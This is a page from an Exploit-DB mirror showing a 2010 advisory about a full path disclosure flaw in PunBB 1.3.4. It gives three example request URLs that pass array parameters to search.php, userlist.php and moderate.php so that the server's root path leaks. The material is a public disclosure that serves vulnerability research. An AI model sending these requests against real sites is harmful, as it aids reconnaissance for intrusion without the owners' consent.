bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15452.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

24 lines
No EOL
834 B
Text
Raw Blame History

# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4
Vulnerability Details:
The
vulnerabilities are in the file and the file /search.php, /userlist.php
and moderate.php not properly control the content of variables
keywords, author and get_host.
An attacker can exploit this to find out the rootpath a website.
Example:
http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
http://www.site.com/[path]/moderate.php?get_host[]=
#SYSTEM_OVERIDE [07-11-2010]
Reference in a new issue View git blame Copy permalink